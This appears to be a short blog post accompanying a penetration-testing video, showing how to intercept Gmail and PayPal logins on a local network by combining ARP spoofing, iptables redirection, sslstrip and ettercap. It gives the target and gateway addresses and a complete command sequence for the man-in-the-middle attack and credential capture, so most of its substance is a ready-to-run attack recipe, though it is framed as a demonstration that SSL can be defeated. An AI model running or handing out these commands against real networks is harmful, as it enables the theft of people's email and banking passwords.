------------------------------------------------------------------------------------
LinksWatch video on-line: http://g0tmi1k.blip.tv/file/2345515
Download video: http://www.mediafire.com/?o4ihmqyxwgz
Commands: http://pastebin.com/q6MY3v6L
What is this?
This video shows that with SSL encryption, it isn't secure. Proof of this is seen by showing a web based email (Google Mail) & online bank (PayPal) password.
How does this work?
> Performing a 'Man In The Middle' attack therefore all the traffic flows through the attacker.
> Picks out HTTP traffic from port 80 and then packet redirection / forwarding onto a different port.
> SSLStrip is then listening on that port and removes the SSL connection before passing it back to the user.
> ettercap then picks out the username & password.
What do I need?
> sslstrip
> arpspoof
> ettercap
*all in BackTrack 4 Pre Final*
Network Setup:
Targets IP: 192.168.1.6
Gateway : 192.168.1.1
Software
Name: sslstrip
Version: 0.2
Home Page: http://www.thoughtcrime.org/software...rip/index.html
Download Link: http://www.thoughtcrime.org/software...rip-0.2.tar.gz
Name: arpspoof (DSniff)
Version: 2.3
Home Page: http://www.monkey.org/~dugsong/dsniff/
Download Link: http://www.monkey.org/~dugsong/dsniff/dsniff-2.3.tar.gz
Name: ettercap
Version: 0.7.3
Home Page: http://ettercap.sourceforge.net
Download Link: http://prdownloads.sourceforge.net/e...ar.gz?download
Commands:
Code:
kate /etc/etter.conf >*uncomment redir_command_off in the iptables, linux section* echo 1 > /proc/sys/net/ipv4/ip_forward arpspoof -i wlan0 -t 192.168.1.6 192.168.1.1 iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000 ettercap -T -q -i wlan0 sslstrip -a -k -f ettercap -T -q -i wlan0
Forum Post: http://www.backtrack-linux.org/forums/backtrack-videos/1659.htm?highlight=
thanks ~g0tmi1k
No comments:
Post a Comment